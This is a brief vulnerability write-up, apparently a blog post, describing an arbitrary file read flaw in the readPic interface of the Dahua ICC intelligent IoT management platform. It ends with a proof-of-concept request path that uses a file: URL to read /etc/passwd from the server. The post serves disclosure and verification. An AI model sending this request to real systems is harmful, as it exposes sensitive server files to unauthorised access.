Dahua Icc Intelligent Iot Comprehensive Management Platform Readpic Arbitrary File Reading Vulnerability
Dahua Icc Intelligent Iot Comprehensive Management Platform Readpic Arbitrary File Reading Vulnerability
Dahua ICC intelligent IoT comprehensive management platform readPic arbitrary file reading vulnerability
Vulnerability Description
Dahua ICC intelligent IoT comprehensive management platform readPic interface has arbitrary file reading vulnerability, and attackers can obtain sensitive files in the server through the vulnerability.
Vulnerability Impact
Dahua ICC intelligent IoT integrated management platform
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd
This post is licensed under CC BY 4.0 by the author.